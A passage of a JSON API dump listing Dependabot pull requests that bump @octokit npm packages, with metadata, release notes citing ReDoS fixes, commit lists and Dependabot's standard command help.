stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)\nYou can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/0GiS0/gh-custom-deploy-protection-rules/network/alerts).\n\n\u003c/details\u003e","html_url":"https://github.com/0GiS0/gh-custom-deploy-protection-rules/pull/4","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/0GiS0%2Fgh-custom-deploy-protection-rules/issues/4","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/4/packages"}},{"old_version":"9.2.1","new_version":"9.2.2","update_type":"patch","path":null,"pr_created_at":"2026-03-16T06:07:16.000Z","version_change":"9.2.1 → 9.2.2","issue":{"uuid":"4080435781","node_id":"PR_kwDORnycEM7K0V15","number":7,"state":"closed","title":"chore(deps): bump the npm_and_yarn group across 1 directory with 4 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":3,"pull_request":true,"closed_at":"2026-03-16T06:09:39.000Z","author_association":null,"state_reason":null,"created_at":"2026-03-16T06:07:16.000Z","updated_at":"2026-03-16T06:09:42.000Z","time_to_close":143,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"npm_and_yarn","update_count":4,"packages":[{"name":"@octokit/endpoint","old_version":"9.0.5","new_version":"9.0.6","repository_url":"https://github.com/octokit/endpoint.js"},{"name":"@octokit/plugin-paginate-rest","old_version":"9.2.1","new_version":"9.2.2","repository_url":"https://github.com/octokit/plugin-paginate-rest.js"},{"name":"@octokit/request","old_version":"8.4.0","new_version":"8.4.1","repository_url":"https://github.com/octokit/request.js"},{"name":"@octokit/request-error","old_version":"5.1.0","new_version":"5.1.1"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 3 updates in the / directory: [@octokit/endpoint](https://github.com/octokit/endpoint.js), [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js) and [@octokit/request](https://github.com/octokit/request.js).\n\nUpdates `@octokit/endpoint` from 9.0.5 to 9.0.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/endpoint.js/releases\"\u003e\u003ccode\u003e@​octokit/endpoint\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev9.0.6\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/endpoint.js/compare/v9.0.5...v9.0.6\"\u003e9.0.6\u003c/a\u003e (2025-02-14)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/endpoint.js/issues/515\"\u003e#515\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/endpoint.js/commit/599ff4f76534ea2872f40b41c4ffbbcca987d6a5\"\u003e599ff4f\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/endpoint.js/commit/599ff4f76534ea2872f40b41c4ffbbcca987d6a5\"\u003e\u003ccode\u003e599ff4f\u003c/code\u003e\u003c/a\u003e fix: ReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/endpoint.js/issues/515\"\u003e#515\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/octokit/endpoint.js/compare/v9.0.5...v9.0.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/plugin-paginate-rest` from 9.2.1 to 9.2.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/releases\"\u003e\u003ccode\u003e@​octokit/plugin-paginate-rest\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev9.2.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.2.1...v9.2.2\"\u003e9.2.2\u003c/a\u003e (2025-02-15)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/660\"\u003e#660\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/e1e44898cf1870f1496ae7f5b2a4476c71044e6b\"\u003ee1e4489\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/e1e44898cf1870f1496ae7f5b2a4476c71044e6b\"\u003e\u003ccode\u003ee1e4489\u003c/code\u003e\u003c/a\u003e fix: ReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/660\"\u003e#660\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.2.1...v9.2.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/request` from 8.4.0 to 8.4.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/request.js/releases\"\u003e\u003ccode\u003e@​octokit/request\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev8.4.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v8.4.0...v8.4.1\"\u003e8.4.1\u003c/a\u003e (2025-02-15)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/741\"\u003e#741\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/356411e3217019aa9fc8a68f4236af82490873c2\"\u003e356411e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/356411e3217019aa9fc8a68f4236af82490873c2\"\u003e\u003ccode\u003e356411e\u003c/code\u003e\u003c/a\u003e fix: ReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/741\"\u003e#741\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/octokit/request.js/compare/v8.4.0...v8.4.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/request-error` from 5.1.0 to 5.1.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/request-error.js/releases\"\u003e\u003ccode\u003e@​octokit/request-error\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.1.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v5.1.0...v5.1.1\"\u003e5.1.1\u003c/a\u003e (2025-02-14)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eReDos regex vulnerability, reported by \u003ca href=\"https://github.com/dayshift\"\u003e\u003ccode\u003e@​dayshift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://github.com/octokit/request-error.js/commit/12a14f03dbfbbdc759c1c20a631b277892da09de\"\u003e12a14f0\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/b51ed2766807a5ca59b5ba477762e84171ccca53\"\u003e\u003ccode\u003eb51ed27\u003c/code\u003e\u003c/a\u003e test: ReDos regex vulnerability, reported by \u003ca href=\"https://github.com/dayshift\"\u003e\u003ccode\u003e@​dayshift\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/12a14f03dbfbbdc759c1c20a631b277892da09de\"\u003e\u003ccode\u003e12a14f0\u003c/code\u003e\u003c/a\u003e fix: ReDos regex vulnerability, reported by \u003ca href=\"https://github.com/dayshift\"\u003e\u003ccode\u003e@​dayshift\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/octokit/request-error.js/compare/v5.1.0...v5.1.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\nYou can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/bit10-101010/actions-comment-pull-request/network/alerts).\n\n\u003c/details\u003e","html_url":"https://github.com/bit10-101010/actions-comment-pull-request/pull/7","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/bit10-101010%2Factions-comment-pull-request/issues/7","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/7/packages"}},{"old_version":"9.1.5","new_version":"9.2.2","update_type":"minor","path":"/github-sdks/js in the npm_and_yarn group across 1 directory","pr_created_at":"2026-03-08T22:03:24.000Z","version_change":"9.1.5 → 9.2.2","issue":{"uuid":"4042280527","node_id":"PR_kwDORhO0587I54S-","number":5,"state":"open","title":"Bump @octokit/plugin-paginate-rest from 9.1.5 to 9.2.2 in /github-sdks/js in the npm_and_yarn group across 1 directory","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-03-08T22:03:24.000Z","updated_at":"2026-03-08T22:03:55.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","packages":[{"name":"@octokit/plugin-paginate-rest","old_version":"9.1.5","new_version":"9.2.2","repository_url":"https://github.com/octokit/plugin-paginate-rest.js"}],"path":"/github-sdks/js in the npm_and_yarn group across 1 directory","ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 1 update in the /github-sdks/js directory: [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js).\n\nUpdates `@octokit/plugin-paginate-rest` from 9.1.5 to 9.2.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/releases\"\u003e\u003ccode\u003e@​octokit/plugin-paginate-rest\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev9.2.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.2.1...v9.2.2\"\u003e9.2.2\u003c/a\u003e (2025-02-15)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/660\"\u003e#660\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/e1e44898cf1870f1496ae7f5b2a4476c71044e6b\"\u003ee1e4489\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev9.2.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.2.0...v9.2.1\"\u003e9.2.1\u003c/a\u003e (2024-03-01)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003epkg:\u003c/strong\u003e pin \u003ccode\u003e@octokit/core\u003c/code\u003e peerDependency to v5 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/599\"\u003e#599\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/5b84386830ebfe873f4ab7e106cc33eec6a2ace7\"\u003e5b84386\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev9.2.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.1.5...v9.2.0\"\u003e9.2.0\u003c/a\u003e (2024-02-22)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003enew \u003ccode\u003e/orgs/{org}/organization-roles/{role_id}/teams\u003c/code\u003e and \u003ccode\u003e/orgs/{org}/organization-roles/{role_id}/users\u003c/code\u003e endpoints (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/594\"\u003e#594\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/75aeaafae8b52afe744958075d95111f37343093\"\u003e75aeaaf\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/e1e44898cf1870f1496ae7f5b2a4476c71044e6b\"\u003e\u003ccode\u003ee1e4489\u003c/code\u003e\u003c/a\u003e fix: ReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/660\"\u003e#660\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/5b84386830ebfe873f4ab7e106cc33eec6a2ace7\"\u003e\u003ccode\u003e5b84386\u003c/code\u003e\u003c/a\u003e fix(pkg): pin \u003ccode\u003e@octokit/core\u003c/code\u003e peerDependency to v5 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/599\"\u003e#599\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/fa01f94c624b3b67f6ef687c80865773a1c99676\"\u003e\u003ccode\u003efa01f94\u003c/code\u003e\u003c/a\u003e ci(action): update actions/add-to-project action to v0.6.0 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/598\"\u003e#598\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/75aeaafae8b52afe744958075d95111f37343093\"\u003e\u003ccode\u003e75aeaaf\u003c/code\u003e\u003c/a\u003e feat: new \u003ccode\u003e/orgs/{org}/organization-roles/{role_id}/teams\u003c/code\u003e and `/orgs/{org}/o...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/54d6bcfef756e5b329d817ce5ad3f92885a00a7d\"\u003e\u003ccode\u003e54d6bcf\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency prettier to v3.2.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/1bfa2f8d338158db33af812168bbfad9d8af4f00\"\u003e\u003ccode\u003e1bfa2f8\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency npm-run-all2 to v6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/eb4a8fe643a368ef3d68f8901d551638230581e1\"\u003e\u003ccode\u003eeb4a8fe\u003c/code\u003e\u003c/a\u003e chore(deps): replace dependency npm-run-all with npm-run-all2 ^5.0.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/11ef7798c8519e8446a92605d4e4bd2008a42c07\"\u003e\u003ccode\u003e11ef779\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency esbuild to ^0.20.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/2b6cc98c51e0816a2873ea5d6e6b4edb01d2e9b9\"\u003e\u003ccode\u003e2b6cc98\u003c/code\u003e\u003c/a\u003e ci(action): update peter-evans/create-or-update-comment action to v4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/d7c9de5bb0366b61666c1270138ce93059c3402a\"\u003e\u003ccode\u003ed7c9de5\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency prettier to v3.2.4 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/588\"\u003e#588\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.1.5...v9.2.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\n[![Dependabot compatibility score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=@octokit/plugin-paginate-rest\u0026package-manager=npm_and_yarn\u0026previous-version=9.1.5\u0026new-version=9.2.2)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\nYou can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/404CellPhoneRepair/Github-Examples/network/alerts).\n\n\u003c/details\u003e","html_url":"https://github.com/404CellPhoneRepair/Github-Examples/pull/5","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/404CellPhoneRepair%2FGithub-Examples/issues/5","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/5/packages"}}]}